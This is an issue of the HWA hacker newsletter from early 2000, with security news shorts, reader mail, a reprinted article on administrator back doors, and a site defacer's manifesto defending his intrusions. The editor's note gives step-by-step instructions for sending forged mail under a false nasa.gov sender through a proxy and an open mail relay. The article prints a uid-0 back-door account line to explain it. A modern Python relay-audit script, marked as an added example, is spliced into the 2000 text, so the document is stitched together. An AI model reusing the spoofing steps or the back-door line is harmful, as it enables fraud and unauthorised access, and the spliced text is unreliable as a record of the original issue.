PST) http://www.wired.com/news/politics/0,1283,34055,00.html?tw=wn20000203 The controversy about Internet wiretaps -- which pitted the FBI and the FCC against the ACLU and the EFF -- has ended with a recommendation against online surveillance. Declan McCullagh reports from Washington. ++ Copy-Protected CDs Taken Back (Technology 3:00 a.m. PST) http://www.wired.com/news/technology/0,1282,33921,00.html?tw=wn20000203 BMG Germany pulls the plug on its first effort to protect CDs from piracy after customers complain that some of the music is unplayable. By Chris Oakes. ++ Moveable Media: Stick or Card? (Technology 3:00 a.m. PST) http://www.wired.com/news/technology/0,1282,34052,00.html?tw=wn20000203 A new industry consortium thinks it has the portable answer to secure storage of music and more: a secure digital memory card. Microsoft signed on Wednesday. Look out, Sony Memory Stick. ++ Net Tax May Get the Heave-Ho (Politics Wednesday) http://www.wired.com/news/politics/0,1283,34075,00.html?tw=wn20000203 It's a matter of changing one sentence in existing legislation. But if Congress approves, the threat of Internet taxation could vanish forever. Or at least for Washington's idea of forever. Declan McCullagh reports from Washington. ++ Class-Action Suit Calls on AOL (Politics Wednesday) http://www.wired.com/news/politics/0,1283,34063,00.html?tw=wn20000203 A lawsuit alleges America Online's newest software disconnects users from competing online accounts. The filing requests $8 billion in damages for version 5.0 users. ++ RealNetworks Helps Pay Piper (Technology Wednesday) http://www.wired.com/news/technology/0,1282,34026,00.html?tw=wn20000203 The Net's streaming media giant adds technology from AudioSoft to facilitate royalty payments to copyright holders. The system will count streams and send the data to the collecting agency. By Christopher Jones. 
++ Virtual Training for Real Jobs (Culture Wednesday) http://www.wired.com/news/culture/0,1284,33897,00.html?tw=wn20000203 Technology may be the cornerstone of the new economy, but people lacking skills are being shut out of the market. One Texas program is trying to get them into the game. Katie Dean reports from Austin, Texas. ++ But, How to Pronounce Dot EU? (Politics Wednesday) http://www.wired.com/news/politics/0,1283,34045,00.html?tw=wn20000203 The European Commission, wanting a piece of the dot com pie, launches an initiative to give businesses on the other side of the pond a uniform suffix. -=- Security Portal News Shorts -=- ++ Trend Micro Virus Alerts: TROJ_FELIZ and W97M_ARMAGID.A - a Windows executable and Word macro virus respectively, both are low risk viruses, not believed to be widespread ++ ComputerWorld: Y2K gives some admins a security education - The threat of online assaults had IT staffs on guard, but midnight came and went without any serious security problems cropping up, according to experts monitoring systems ++ ZDNet: Script virus looks to ring in new year - The first virus to get its own press release in the year 2000 appears to be little more than a nuisance. Meanwhile, pirate-killer Trojan.Kill also quiet ++ Jan 1, 2000 Symantec: PWSteal.Trojan Virus - PWSteal.Trojan is a trojan which attempts to steal login names and passwords. These passwords are often sent to an anonymous email address CNN: CA warns of Y2K-triggered virus - CA said the "Trojan.Kill_Inst98" virus will delete all the files on an infected PC's C: drive when the system clock rolls over to Jan. 1, 2000 ++ Dec 31, 1999 NAI: Zelu Virus - This is an MS-DOS executable which can destroy data on the hard drive. The original filename as received to AVERT is Y2K.EXE and is 24,944 bytes in size. If this file is run, it simulates checking the system for Y2K compliancy. 
It is not however doing any such thing - it is trashing files on the local system rendering the machine inoperable. Not believed to be widespread. ++ Y2K Status Update - no news is good news ++ Sophos Virus Alert: WM97/Chantal-B - WM97/Chantal-B is a Word macro virus which drops a batch file virus and a Visual Basic script trojan horse. On the 31st of any month the virus displays the Microsoft Office assistant with the message: "Y2K is Coming Soon". If the year is 2000 the virus attempts to delete all files in the current directory and in the root directory of the C: drive Sophos Virus Alert: WM97/BackHand-A - If the date is Friday the 13th the virus password protects the document with the password "Trim(Two)". Then, if the year is 2000, it resets the computer's date to 1/1/1980 ++ CERT: Estimate of the Threat Posed by Y2K-Related Viruses - About a dozen Y2K-related viruses have been reported, but they are not widespread. Moreover, because viruses have to be executed to operate and because most people will not be at their keyboards as the date rolls over, the likelihood of a significant virus event is low. As people return to work next week, the virus risk may increase somewhat for all types of viruses, but there is no reason to expect a major outbreak. NAI Virus listing: ExploreZip.C or Minizip III - This is another variant of the original W32/ExploreZip.worm distributed earlier in 1999. This version is different in that it is "localized" with Spanish error messages however will function on English Windows systems. This edition was compressed using another compression tool.
Not currently rated as a high risk threat ++ Dec 30, 1999 ZDNet: Apple's OS 9 patch brings new problems - Although many users were impressed by Apple's quick reaction this week to the discovery of a potential security flaw in Mac OS 9, those users who have applied the new OT Tuner 1.0 patch are reporting loss of all network connectivity or crashes during startup. Apple says patched machines simply need to be restarted ++ Sun Security Bulletin 192: CDE and OpenWindows - Sun announces the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, 2.3 (SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4, 5.3), and SunOS 4.1.4, and 4.1.3_U1 which relate to various vulnerabilities in CDE and OpenWindows Sun Security Bulletin 191 sadmind - Sun announces the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, and 2.3 (SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4 and 5.3), which relate to a vulnerability with sadmind Thanks to myself for providing the info from my wired news feed and others from whatever sources, Zym0t1c and also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ======================================================================== The message board is DEAD, it was an experiment that failed. Perhaps I'll revive a board when I can run some good board software on our own host. Don't be shy with your email, we do get mail, just not much of it directed to other readers/the general readership. I'd really like to see a 'readers mail' section. Send in questions on security, hacking, IDS, general tech questions or observations etc, hell we've even printed poetry in the past when we thought it was good enough to share.. - Ed ======================================================================= Seen on security focus: To: Security Jobs Subject: Virus coder wanted Date: Thu Jan 27 2000 00:18:44 Author: Drissel, James W.
Message-ID: Computer Sciences Corporation in San Antonio, TX is looking for a good virus coder. Applicants must be willing to work at Kelly AFB in San Antonio. Other exploit experience is helpful. Send Resumes/questions to james.drissel@cmet.af.mil -=- From: To: Sent: Wednesday, January 05, 2000 1:02 AM Subject: Just some comments Hello staff of HWA, Just thought i would tell u guys that u r doin a pimp ass job and if its alright i would like to put a link up on my webpage to this interesting and informative site. Mail me back plez. Pyr0-phreak@geeks404.com www.crosswinds.net/~pyr0phreak -=- From: Andrew Nutter-Upham To: Sent: Sunday, January 02, 2000 9:42 PM Subject: about your site. I love the newsletter, read every edition. but your site sucks. now i don't blame you, a lot of people have problems with good site design. I do web design as a part time job, and I'd like (just to be nice, for money of course.) to redo the site, if that's ok with you, I could leach the site down, but i think it'd be easier if you could just zip it up and send it to me. if you like my revisions feel free to keep them. if not, that's ok too, i just thought that I'd put in the offer. Think it over. thanks for listening. -andy It sure does suck, it's getting pretty shoddy and outdated looking, a tad ragged around the edges, I've done some minor patch-up mods to make things better but don't have time to work on it in a major way, perhaps we can get something going here... - Ed -=- From: Lascarmaster To: Sent: Monday, January 24, 2000 1:58 AM Subject: [ AD!
] Hello CRUCIPHUX, hello from France, my site is a French hacker portal with some good links and news for hackers (in French I prefer the word lascar). By the way, if you could place this ad on your next hwa.hax0r digest, it could be very nice. Try my site at http://lascars.cjb.net ______________________________________________________________ French Hackers' Portal / The French-speaking Hackers' Portal Links and News of interest / Links and news for hackers. ;-) -------------------------------------------------------------- ->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<- ______________________________________________________________ The Lascars portal is http://Lascars.cjb.net Lascarmaster mailto:Lascars@iquebec.com ______________________________________________________________________________ If your email were on iFrance you could listen to this message by phone! http://www.ifrance.com : don't leave your emails far from you any more ... free on iFrance: email (20 MB, POP, FAX), calendar, personal site -=- From: Dragos Ruiu To: Sent: Tuesday, January 25, 2000 9:50 PM Subject: kyxspam: IMxploits in the news (First reported in Salon huh.?... Bay Area tunnel vision is an interesting phenomenon. Has anyone made the definitive IM vulnerability and exploit page yet? As in I'M owned. --dr :-) Hack Takes Aim at AOL Clients Wired News Report 5:30 p.m. 24.Jan.2000 PST A security breach on AOL Instant Messenger put the privacy of AIM users at risk on Monday, according to a published report. The breach, first reported in Salon, allows subscribers to link new AOL accounts to AIM names that already exist. Holes in the sign-up process allow people to get around the password protection of the AIM accounts. "We are aware of it and are deploying security measures to defeat it," said Rich D'Amato, a spokesman for AOL. AOL's online service is used to change passwords, so hackers are easily able to open new accounts using the existing AIM user's name.
People who subscribe to AOL are not affected by the breach. People who use instant messaging software (AIM) outside of AOL are. D'Amato called the security breach an example of "hacker behavior that crosses the line into illegal action." "Our intention is to investigate this and when we identify an individual or groups of individuals, we intend to bring this to the attention of the proper law enforcement authorities," D'Amato said. He declined to speculate on when the problem will be fixed or how many users were affected, although he characterized it as "a very small number." David Cassel, who edits the AOL Watch mailing list, claimed the security hole was easily preventable. It was simply a matter of someone thinking through the sign-on process. "AOL left a gaping hole in the way they implemented it," Cassel wrote in an email. "Those who happened to have an AOL account weren't vulnerable, but everyone else was. To promote such an easily cracked software really violates any reasonable expectation of security. In that sense, all AIM users were affected." "AOL is a marketing company, not a technology company," Cassel wrote. "They mass-promoted a software that's vulnerable to easy attacks." -- kyx.net we're from the future - home of kanga-foo! -=- From: Dragos Ruiu To: Sent: Tuesday, January 25, 2000 10:32 PM Subject: kyxspam: hacking for politics. http://news.cnet.com/news/0-1005-200-1531134.html?tag=st.ne.ron.lthd.1005-200-1531134 Hackers attack Japanese government sites By Reuters Special to CNET News.com January 25, 2000, 11:40 a.m. PT TOKYO--Japanese officials suffered an embarrassment today when hackers penetrated two government Web sites, leaving a message in one of them criticizing the Japanese government's position on the 1937 Nanjing Massacre.
Computer systems at Japan's Management and Coordination Agency were raided yesterday, and its home page was replaced with derogatory messages insulting the Japanese in the first-ever hacking of the country's government computer system. The hackers left a message on the Web site in Chinese blasting the Japanese government for refusing to acknowledge that the Nanjing Massacre took place, media reports said. Jiji news agency said it had deciphered the message, which originally came in garbled, to read: "The Chinese people must speak up to protest the Japanese government for refusing to acknowledge the historical misdeed of the 1937 Nanjing Massacre." Hundreds of thousands of civilians were massacred by Imperial Army troops during the 1937-38 occupation of the central Chinese city. A meeting by ultrarightist Japanese in Osaka last weekend to whitewash the incident, also called the Rape of Nanking, has whipped up new anger in China, where hundreds marched through the streets of Nanjing to denounce the conference. The Chinese government lodged protests about the gathering. But the Japanese government, which acknowledges that the incident was no fabrication as some ultrarightists claim, failed to bar the group from holding the weekend meeting. A similar hacking incident occurred on Japan's Science and Technology Agency's home page. Agency officials declined to give details of the messages but said the home page was also replaced with a direct access switch to adult magazine Web sites. Top government spokesman Mikio Aoki said the government would launch an extensive investigation into the hacking incidents, including possible help from Washington, which is more advanced in dealing with hackers. "The government must take all necessary measures including seeking help from the United States," Aoki said at a news conference. Officials said it was not immediately clear whether the same hacker was responsible for the two separate cases of infiltration.
Story Copyright © 2000 Reuters Limited. All rights reserved. -- kyx.net we're from the future - home of kanga-foo! -=- From: Dragos Ruiu To: Sent: Wednesday, January 26, 2000 5:15 PM Subject: kyxspam: who watches the watchmen? (tip o'de hat to rfp's site {wiretrip.net} that had this article link. Luv dem skins... --dr) http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-security.html Who gets your trust? Security breaches can come from those you least suspect Summary Systems administrators have extraordinary access to all the data on corporate systems. What can be done to ensure that your administrators will not betray that trust? WIZARD'S GUIDE TO SECURITY By Carole Fennelly In the business world you will often hear the statement "We don't hire hackers." When pressed for a reason, the speaker usually reveals a fear that a "hacker" will install a back door in the system. Time and time again, however, I have seen back doors installed by employees or security professionals whose integrity is never questioned. When confronted, they usually say it's no big deal. After all, they have the root password. They just wanted to set up a root account with a different environment. That's not hacking, right? Wrong. Their intention did not matter -- the security of the system has been bypassed. This article discusses how administrative privileges can be abused and suggests some methods for countering that abuse. It is not meant to imply that every administrator abuses privileges or has malicious intent -- just that you shouldn't assume anything. What is a back door? Quite simply, a back door is a method for gaining access to a system that bypasses the usual security mechanisms. (Has everyone seen WarGames?) Programmers and administrators love to stick back doors in so they can access the system quickly to fix problems. Usually, they rely on obscurity to provide security. 
Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn't have time to go through all that might just rig up a back exit so they can step out for a smoke -- and then hope no one finds out about it. In computer systems, a back door can be installed on a terminal server to provide direct access to the console remotely, saving the administrator a trip to the office. It can also be a program set up to invoke system privileges from a nonprivileged account. A simple back door is an account set up in the /etc/passwd file that looks like any other userid. The difference is that this userid doesn't have to su to root (and it won't show up in /var/adm/sulog) -- it already is root:

    auser:x:0:101:Average User :/home/auser:/bin/ksh

If you don't see it, look again at the third field (userid) and compare it to the root account. They are the same (0). If you are restricting direct root logins to the console only (via /etc/default/login), then this account will have the same limitation. The difference is that if someone does su to this account, it will not be apparent in /var/adm/sulog that it is root. Also, a change to the root password will not affect the account. Even if the person who installed the account intends no harm, he or she has left a security hole. It is also pretty common for an administrator to abuse the /.rhosts file by putting in desktop systems "temporarily." These have a way of becoming permanent. Back doors can also be set up in subtler ways through SUID 0 programs (which set the userid to root). Usually, the motivation for setting up back doors is one of expediency. The administrator is just trying to get a job done as quickly as possible. Problems arise later when either (1) he leaves under normal circumstances and the hole remains or (2) he leaves under bad circumstances and wants revenge.
Proprietary data A manager may also be reluctant to hire "hackers" for fear that they may divulge proprietary information or take copies of proprietary data. Several years ago, I was consulting at a company when a new administrator joined the group. In an effort to ingratiate himself with the team, he confided that he had kept the backup tapes from his old job (a competitor) and that they had some "really cool tools." It so happened that a consultant with my own business worked at the competitor's site. A scan of the tape revealed the proprietary software that the administrator had been working on, which eventually sold for a significant amount of money. While the admin probably did not intend to steal the software, his actions could have left his new employer facing a large lawsuit -- all for the sake of a few shell scripts. In this particular case, no one believed that the administrator had any ulterior motives. I wonder if people would have felt that way if he had been a "known hacker"? System monitoring Administrators are supposed to monitor system logs. How else can problems be investigated? But there is a difference between monitoring logs for a legitimate reason and monitoring them to satisfy prurient curiosity. Using the system log files to monitor a particular user's behavior for no good reason is an abuse of privileges. What is a good reason? Your manager asks you to monitor specific logs. Or maybe you notice suspicious activities, in which case you should inform the management. Or, more commonly, a user complains about a problem and you are trying to solve it. What is a bad reason? A user ticks you off and you want to see how he is spending company time. Or a user has a prominent position in the company and you want to know what kinds of Websites she goes to. Countermeasures You can take some actions to ensure the integrity of privileged users, but none of them carries any guarantee. 
Background checks You can have an investigative agency run a background check on an individual and you can require drug tests. These tell you only about past behavior (if the individual has been caught). The state of New Jersey (where I live) has adopted a law commonly referred to as Megan's Law (see Resources). The law mandates that a community be notified of any convicted sex offender living in the community. On the surface, it sounds like a great idea and a way to protect children from predators. As a parent, I am particularly sensitive to crimes against children. I received a Megan's Law notification this past year about a convicted sex offender who moved into town. It did not change a thing for me. My feeling is that every child molester has to have had a first time and that in any case not all molesters have been identified. Therefore, I take appropriate precautions with my children, regardless of who has moved to the area. In the technical field, hackers are considered the molesters. (Yes, I know all about the politically correct terms cracker, defacer, etc., but the common term these days is hacker.) How do you know if someone is a "hacker"? Some people try to refine the term to mean "someone who has been convicted of a computer crime." But let's say, for example, that you attend Defcon, the hackers' conference, and encounter an intelligent job seeker with bright blue hair and funky clothes. Would you hire him? Chances are that you would at least scrutinize his credentials and make sure your contract spelled out all details of the work to be performed and the legal repercussions for any violations. What if the same person showed up for an interview with the blue dye rinsed out and in a nice pressed suit? Be honest: would you perform the same background checks regardless of a person's appearance? Technical measures Some technical software packages can limit or control superuser privileges. 
I recommend using them to prevent the inadvertent abuse of superuser privilege. Unfortunately, knowledgeable administrators and programmers with privileged access will be able to circumvent these measures if they really want to.

sudo

The freely available sudo package provides more granular control over the system by restricting which privileged commands can be run on a user basis. See Resources for the Sudo main page, which has a more complete description.

Tripwire

Tripwire is a file integrity package that, following the policy determined by the administrator, reports any changes made to critical files. Tripwire was originally developed at Purdue University by Gene Kim under the direction of Eugene Spafford. I plan to evaluate the merits of the commercial version of Tripwire in a future column. Tripwire is a good way for an administrator to tell whether the system files or permissions have been modified. What can be done, however, if the senior administrator who monitors the system has malicious intent?

Professionalism

The best defense against the abuse of administrator privileges is to rely on a certain level of professionalism. The medical Hippocratic oath includes the mandate Do No Harm. While there is no such professional oath for systems administrators, you can establish guidelines for acceptable behavior. During the mid-1980s, I worked as an administrator in a computer center at a large telecommunications research facility. We had a code of ethics that a user had to sign before an account could be installed. We also had a code of ethics for privileged users that included additional restrictions, such as:

- No SUID 0 (set userid to root) programs will be installed without the consent, in writing, of the senior administrator.
- All users' email is to be considered private and confidential and may not be read by anyone other than the intended recipient.
- Users' files may not be modified or read except in the case of a predetermined problem or security investigation. Be prepared to justify.
- Privileged users are often entrusted with sensitive information, such as an employee termination, before other employees. This information is to be kept confidential.
- The root passwords are changed monthly and are to be distributed by the senior administrator only. The passwords must be kept in a safe location, such as your wallet. If the password is lost, notify the senior administrator or your manager immediately.
- Keystroke monitoring of user activities is strictly prohibited without senior management approval, in writing.
- All administrative procedures and tools are to be considered proprietary information and are the property of the computer center.
- Tape archives may not be removed from the facility without written approval.

Discretion

A code of ethics for privileged users should not be considered a punitive device, but rather a statement about the integrity of the person who signs it. At one point during my years in the computer center, the secretary to the president of the company came to me with a printer problem. As I was assisting her, she became upset when she realized that the test job she had sent to the printer was highly confidential. I was able to reassure her that all administrators were bound by a code of ethics and would be terminated for violations. (Besides, I wasn't really reading it, I was just looking for garbage characters!) Professionals must establish a certain level of trust. This is especially important for those privy to sensitive information regarding terminations or investigations.

Final thoughts

Would I hire someone who showed up for an interview with blue hair, body piercings, and a name like 3v1l HaK0rZ? No. Not because he might install a back door, but because he was ignorant about what was acceptable on Wall Street. As for the back doors? More are installed by well-groomed "professionals" in suits than by "hackers." Anyone with the required skills can be either a "security consultant" or a "hacker."
The only difference is the label. Disclaimer: The information and software in this article are provided as-is and should be used with caution. Each environment is unique, and readers are cautioned to investigate, with their companies, the feasibility of using the information and software in this article. No warranties, implied or actual, are granted for any use of the information and software in this article, and neither the author nor the publisher is responsible for any damages, either consequential or incidental, with respect to the use of the information and software contained herein. About the author Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security consulting. She has been a Unix system administrator for almost 20 years on various platforms and of late has focused on sendmail configurations. Carole provides security consultation to several financial institutions in the New York City area. -- kyx.net we're from the future - home of kanga-foo! -=- 02.0 From the editor. ~~~~~~~~~~~~~~~~ _____ _ _ _ _ | ____|__| (_) |_ ___ _ __( )__ | _| / _` | | __/ _ \| '__|/ __| | |__| (_| | | || (_) | | \__ \ ___|_____\__,_|_|\__\___/|_| |___/ / ___| ___ __ _ _ __ | |__ _____ __ \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ / ___) | (_) | (_| | |_) | |_) | (_) > < |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\ |_| #include <stdio.h> int main(void) { printf ("Read commented source!\n\n"); /* * Yes we've wavered from our weekly release schedule, sorry * about that, I've been indulging in other projects requiring * more of my time (network IDS related etc) but you will find * pretty much full coverage of the time period Jan 16th to Feb * 12th or so included in this issue. * * I've rearranged stuff a little, I've moved some of the fodder * that I'm sure was annoying some people and definitely at * least one (grin) to the END of the newsletter, into the * appendices where it should probably have been in the first * place.
So if you're looking for the gov and mil sites that * have scoured our site or want to check the FAQ or our source * or resource lists etc, they have all been moved to the back * so now you can more or less 'dive in' to the news material * and content without paging thru stuff you may have already * seen a million times. * * Also did a slight modification/clean up of the website, its * going to be redone but meanwhile i've made it a little less * cumbersome and easier to navigate. Also added a toy or two * want a user@hax0r-news.zzn.com mail address? I knew you did * (heh) well now you can, just follow the link and away you * go to yet another web based mail account...sorry appears to * be no forwarding. * * This will include alot of HNN rehashed material, i'm working * on automating the retreival of certain news sources for time * saving in creating these issues, since we have access to * other sources of info that don't get explored as often as * I'd like, also keeping up with exploits is not so difficult * now that packetstorm no longer has the contact base it once * did. If you can suggest sites that get 0-day (grin) or current * exploit code or the sites of the coders themselves, please * send in the url/list info etc so we can keep everyone up to * date. * * I shall finally be asking some help from people, I can no * longer do this by myself to my satisfaction, so I hope to * enlist some eager beavers with time to kill on this project * rather than let release dates drift further and further * apart. * * * Things are a bit messy and not necessarily in chronological * order, I don't like it but thats the way it turned out, I * really need to spend more time on this to get it organized * more neatly and make it more accessible, comments welcome. * * We need more submissions!, if you submit to security NG's or * mailing lists about exploits or security concerns that you * think may be of interest to our readers, consider CC: a copy * to me for inclusion here. 
I try and cover a broad spectrum * (perhaps too broad) of security/hacker related material and * as such a little help with material would be most appreciated. * * mucho props out to Zym0t1c who is contributing more and more * to the zine lately, thanks dude! * * Cruci * * cruciphux@dok.org * Preffered chat method: IRC Efnet in #HWA.hax0r.news * */ printf ("EoF.\n"); } Snailmail: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 Anonymous email: telnet (wingate ip) (see our proxies list) Wingate>0.0.0.0 Trying 0.0.0.0... Connected to target.host.edu Escape character is '^]'. 220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST) HELO bogus.com 250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you MAIL FROM: admin@nasa.gov 250 admin@nasa.gov... Sender ok RCPT TO: cruciphux@dok.org 250 cruciphux@dok.org... Recipient ok DATA Secret cool infoz . QUIT If you got that far everything is probably ok, otherwise you might see 550 cruciphux@dok.org... Relaying denied or 550 admin@nasa.gov... Domain must exist etc. * This won't work on a server with up to date rule sets denying relaying and your attempts will be logged so we don't suggest you actually use this method to reach us, its probably also illegal (theft of service) so, don't do it. ;-) -=- Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods, trinoo and tribe or ol' papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 
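The relay session above doubles as an audit of your own server's rule set: an admin who captures the same exchange against a host they run can read off whether it relayed. The Python below (an added example, not HWA's or Sendmail's code) pairs each client command in a transcript with the reply that follows and reports whether a foreign sender to a foreign recipient was accepted; the local-domain set and the sample sessions are constructed for this example.

```python
"""Open-relay verdict from an SMTP transcript (added example, not HWA code)."""
import re
from dataclasses import dataclass, field

_CMD_RE = re.compile(r"^(HELO|EHLO|MAIL FROM|RCPT TO|DATA|QUIT)\b\s*:?\s*(.*)$", re.I)
_REPLY_RE = re.compile(r"^(\d{3})[ -](.*)$")
_ADDR_RE = re.compile(r"<?([^<>\s]+@[^<>\s,]+)>?")


@dataclass
class RelayVerdict:
    sender: str = ""                                   # accepted MAIL FROM
    accepted: list = field(default_factory=list)       # RCPT TO answered 2xx
    denied: list = field(default_factory=list)         # RCPT TO answered 5xx
    notes: list = field(default_factory=list)
    open_relay: bool = False


def _address(arg: str) -> str:
    m = _ADDR_RE.search(arg)
    return m.group(1).lower() if m else ""


def _is_local(addr: str, local_domains: set) -> bool:
    # True when the address is in one of our domains or a subdomain of one.
    if "@" not in addr:
        return False
    domain = addr.rsplit("@", 1)[1].rstrip(".")
    return any(domain == d or domain.endswith("." + d) for d in local_domains)


def analyze_transcript(text: str, local_domains: set) -> RelayVerdict:
    # Open relay: a 2xx to a RCPT TO outside local_domains while the accepted
    # MAIL FROM is also outside them. Banner lines and body text are ignored.
    local = {d.lower() for d in local_domains}
    verdict = RelayVerdict()
    pending = None   # (command, argument) still waiting for its reply
    in_data = False  # inside the message body after DATA; no commands there
    for raw in text.splitlines():
        line = raw.strip()
        if in_data:
            in_data = line != "."
            continue
        reply = _REPLY_RE.match(line)
        if reply and pending:
            code, msg = reply.groups()
            cmd, arg = pending
            pending = None
            if cmd == "MAIL FROM":
                if code.startswith("2"):
                    verdict.sender = _address(arg)
                else:
                    verdict.notes.append(f"sender rejected: {code} {msg}")
            elif cmd == "RCPT TO":
                rcpt = _address(arg)
                if code.startswith("2"):
                    verdict.accepted.append(rcpt)
                    if not _is_local(verdict.sender, local) and not _is_local(rcpt, local):
                        verdict.open_relay = True  # foreign -> foreign went through
                else:
                    verdict.denied.append(rcpt)
                    verdict.notes.append(f"recipient rejected: {code} {msg}")
            continue
        cmd = _CMD_RE.match(line)
        if cmd:
            pending = (cmd.group(1).upper(), cmd.group(2))
            if pending[0] == "DATA":
                in_data, pending = True, None
    return verdict


# Constructed sample modelled on the session above: outside sender and outside
# recipient both accepted, so the server relayed.
OPEN_RELAY_SESSION = """\
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
HELO bogus.com
250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
250 admin@nasa.gov... Sender ok
RCPT TO: cruciphux@dok.org
250 cruciphux@dok.org... Recipient ok
DATA
Secret cool infoz
.
QUIT
"""

# Same exchange against a server whose rule set denies relaying.
RELAY_DENIED_SESSION = OPEN_RELAY_SESSION.replace(
    "250 cruciphux@dok.org... Recipient ok",
    "550 cruciphux@dok.org... Relaying denied")

# Envelope sender rejected before any recipient is tried (constructed).
SENDER_REJECTED_SESSION = """\
220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3
HELO bogus.com
250 target.host.edu Hello [ 0.0.0.0 ], pleased to meet you
MAIL FROM: admin@nasa.gov
550 admin@nasa.gov... Domain must exist
QUIT
"""
```

Call `analyze_transcript(session_text, {"your.domain"})` on a transcript captured against a server you administer; `open_relay` is True only when an accepted recipient and the accepted sender are both outside the domains you pass.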
-= start =--= start =--= start =--= start =--= start =--= start =--= start

-= start =--= start =--= start =--= start =--= start =--= start =--=

03.0 Slash, Croatian cracker, speaks out
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is from one of the last defacements that Slash has done; he has
since renounced defacing and is starting a new security group called b0f
(Buffer Overflow). We'll keep you posted as this develops. - Ed

Defaced by slash [ 2.1.2000 ]

Original site here
(http://www.attrition.org/mirror/attrition/2000/01/08/www.badjura-petri.com/index-old.html)

www.badjura-petri.com

- I got some interesting mail in the last few days that I want to share with
You. The first one is from a Security Consultant David Hove, who works for a
company named "RISCmanagement Inc." (www.riscman.com), and this is what he
wrote to me in his mail :

------

Numb Nuts,

Your judgments lay upon broken young souls who know no better. Let it be!
Hackers will hack regardless of holes previously exploited. If the sys adm
does not fix their holes this is not the issue. Hacking for fame is not the
issue. You yourself mailed your hack in for recognition did you not. STOP THE
HYPOCRISY AND SIMPLY HACK. Who the hell are U to dictate what should be placed
on a defaced website? I personally work the other side of the fence
specializing in keeping you out but thoroughly enjoy watching you and others
like you go about your daily routine. Exploiting port 80, buffer overflows,
running your little scripts, etc. Fuck ethics! The harder you try to hack the
more aware we become as admins. For those admins who do not keep up Fuckem!

David Hove
Security Consultant
CCSA/CCSE
RISCmanagement Inc.
www.riscman.com

-------

Dear Mr. David, your email made me very sad because I realized that people
don't get the message I'm trying to say. Hacking previously hacked sites is
considered lame, and yes, hacking for fame is the issue. Hackers nowadays hack
only to get media attention. In my country a 16 year old Back Orifice user was
raided for "hacking" a computer of a Croatian politician. The media made a
national hero out of him. In the interview he said that he could hack into a
bank with just two of his friends and a good computer. Now, people who read
that newspaper bought the story, but people who know young Denis via IRC can
confirm that he is a complete idiot and a lamer. His parents are so proud of
him, not knowing that anyone can "hack" using Back Orifice.

About me mailing my hack to attrition. Yes, I did mail the hack to attrition,
you know why !? I deface to spread the message out. I personally think if I
just deface the site that people won't notice it. So I report it to attrition
and they put a mirror of the site I defaced so other people can view it too.
I don't do it for the fame. I could hack under a different name every time,
but this is my style. I don't go bragging on IRC "I hacked this..", "I hacked
that..". I don't have to prove my skillz to anyone. People can respect me or
hate me. I sincerely doubt that defacing a site will make me look better in
front of my friends. Almost anyone can find himself a remote exploit and run
it against the server. But not anyone can secure a Unix server, program or
even make html. For me defacing is just expressing my opinion on stuff,
nothing more.

About 'fuck the ethics' thing. Mr. David, the ethics are here to prevent a
major chaos. Without ethics people would just go around and delete anything
they run into. I suggest every hacker stick to the ethics as close as he can,
hell, that's why they were written. I know people forget about them, but there
are always people like me to remind hackers about the ethics. That's the
balance. People don't stick to them, they leave stupid messages like "I 0wn3
j00". I tell You people, that's bad. Can't You just write something. Anything,
just not these stupid irritating messages.

Ok, we started another discussion here. "Who the hell are U to dictate what
should be placed on a defaced website?" - You say. Well, You're right. I'm
nobody. I can't dictate what should be placed on a defaced website. But I can
suggest people not to do it. I just suggested it, I didn't dictate or order
it.

"The harder you try to hack the more aware we become as admins." - Aware ?! If
I deface Your site ten times, and don't tell You how I got in, You become more
aware !? I damage Your company for 10.000 $ by defacing it, because people
say: "How can they secure my server when they can't even secure their own."
And nobody wants Your service anymore. Don't get me wrong. I'm sure You're a
very good and experienced administrator, but nothing is secure enough that
hackers can't break it. That's what we devoted Our lives to, penetrating
systems.

I enjoy hacking. That is really something unique. People through ages have
always wanted to do something that's forbidden or illegal. Just remind
Yourself of Adam & Eve, and the Heaven garden. Eve had to eat that apple
although God gave them everything they needed, and just forbid them to eat
apples from that tree. Hacking is illegal in many countries. You could get a
worse sentence for hacking than for murdering someone. I don't really care if
I get raided. Hacking is my crime. A crime out of passion. Respect me or hate
me, the choice is Yours.

- Peace out, slash

- Shoutouts - p4riah, LogError, zanith, v00d00, PHC, THC, attrition.org,
net-security.org, ex1t, sAs72, Cruciphux, HWA.hax0r.news, BHZ, SiRiUs, sLina,
kLick_Mi, Emptyhead, mosthated, pr1sm, fuqraq, airWalk, [Princev], zeroeffect,
and the whole BLN.

- Peace to my man whitecee, keep Your head up. Peace to everyone who gave
support via email or IRC. I wish You a happy and a bug-free New Year.
Links...

- Attrition.org: Keep up the good work fellows
- HelpNet Security: The best news site on the net
- Black Lava Network: BLN for life !!!

Copyright © slash
Penetrating systems since 1998

@HWA

04.0 The hacker sex chart 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This was to be included in the last issue but attrition was down (only source
I know of that carries it) so here it is in its glory.

*********** WARNING: Explicit content **************************************

